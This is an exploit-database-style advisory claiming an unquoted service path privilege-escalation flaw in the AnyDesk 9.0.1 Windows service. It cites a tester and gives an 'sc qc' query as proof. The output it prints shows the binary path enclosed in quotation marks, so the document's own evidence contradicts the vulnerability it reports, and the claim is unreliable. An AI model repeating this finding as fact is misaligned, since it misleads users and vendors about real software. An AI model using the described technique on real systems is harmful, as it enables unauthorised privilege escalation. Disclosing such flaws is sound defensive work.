# Exploit Title: AnyDesk 9.0.1 - Unquoted Service Path # Date: 2024-12-11 # Exploit Author: Parastou Razi # Contact: [email protected] # Vendor Homepage: http://anydesk.com # Software Link: http://anydesk.com/download # Version: Software Version 9.0.1 # Tested on: Windows 11 x64 1. Description: The Anydesk installs as a service with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. 2. Proof C:\>sc qc anydesk --service [SC] QueryServiceConfig SUCCESS SERVICE_NAME: anydesk TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AnyDesk Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem